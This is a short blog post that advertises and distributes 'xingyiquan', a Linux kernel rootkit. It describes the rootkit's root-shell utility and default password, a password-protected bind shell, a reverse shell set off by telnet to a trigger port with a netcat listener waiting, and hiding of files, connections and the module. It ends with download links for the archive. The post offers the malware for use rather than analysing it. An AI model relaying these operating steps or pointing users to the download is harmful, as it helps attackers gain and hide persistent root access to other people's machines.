Category Archives: kernel

xingyiquan – simple linux kernel rootkit for kernel 3.x and kernel 2.6.x

This is simple linux kernel rootkit works for kernel 3.x and 2.6.x.

FUNCTIONS

– escalate privilege
This rootkit has a binary utility named xingyi_rootshell, once this rootkit installed, you can get rootshell by type : ./xingyi_rootshell “sw0rdm4n”. String “sw0rdm4n” is default password for root shell, This string is written in
userspace config file at xingyi_userspace_src/xingyi_userspace_config.h

– bindshell
This rootkit has a default bind shell on port 7777 using default password : “sw0rdm4n”. String “sw0rdm4n” is default password for bind shell, This string is written in
userspace config file at xingyi_userspace_src/xingyi_userspace_config.h

– reverse shell
This rootkit has reverse shell functionality which will be triggered by netfilter hook, in order to get reverse shell to your ip via port 7777, you must fire telnet on port 1337 to the box where you install this rootkit. Before that
make sure you prepare a netcat listener on port 7777.

– another common functions
Another common functions : hide files/dirs, hide connections, hide module, hook kill process, hook open, hook open directory, etc.

Download

http://www.ringlayer.net/repo/xingyiquan.tar.gz

http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/xingyiquan.tar.gz

 

Advertisements